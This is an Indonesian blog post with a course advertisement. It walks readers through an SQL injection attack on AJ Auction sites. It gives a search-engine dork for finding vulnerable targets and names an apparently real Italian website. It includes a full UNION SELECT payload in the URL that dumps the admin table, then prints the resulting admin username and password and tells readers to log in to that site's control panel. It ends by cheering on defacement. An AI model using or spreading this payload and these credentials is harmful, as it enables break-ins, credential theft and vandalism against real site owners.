SQL Injection AJ Auction seluruh versi

SQL Injection AJ Auction seluruh versi

Diposting oleh: Ilmu Website kategori: SECURITY

SQL Injection pada Aj Auction untuk seluruh versi.

Promo Tutorial Premium Video Tutorial Mahir Web Development (Bangun 5 Project Website) + Video Tutorial Membuat Aplikasi Mobile (Bangun 4 Aplikasi Android + Upload Playstore) + Bonus Tutorial Membuat Theme Wordpress Premium - 3 Tutorial (5DVD) Hanya Rp 135.000 - Terbatas hanya sampai 17 April!

Dibuat oleh praktisi yang memiliki pengalaman lebih dari 10 tahun di bidang web development (Pemesanan bisa SMS/WA ke 0838 1157 5876, atau bisa pesan secara online di sini)


Lagi-lagi bug baru di temukan, kali ini Al-k akan coba masuk
sebagai admin pada situs yang memiliki bug pada halaman subcat.php

langsung aja buka google-nya ...
masukkan keyword ini inurl:/subcat.php?cate_id=

nah loh, dapet banyak bangett ...
pilih aja salah satunya contoh :

http://www.estoop.it/subcat.php?cate_id=146&view=list&PHPSESSID=27c9b2b6500f2c01c09eda1978d45096

setelah cate_id= di hapus aja kemudian di ganti dengan

-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,117,114,107,101,121,112,97,115,115,58),pas

sword),2%20from%20admin/*&view=list

kira kira jadi begini

http://www.estoop.it/subcat.php?cate_id=-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,11

7,114,107,101,121,112,97,115,115,58),password),2%20from%20admin/*&view=list

nah loh passwordnya langsung dapet

turkey:adminturkeypass:daniel87

itu artinya
usernamenya admin
passwordnya daniel87

sekarang masuk ke control panelnya

http://www.estoop.it/admin
terus masukkin username dan passwordnya

jreng jreng jreng anda di bawa ke control panel ...

hehehehe ... deface deface ...

Artikel Terkait :

11 June
0
0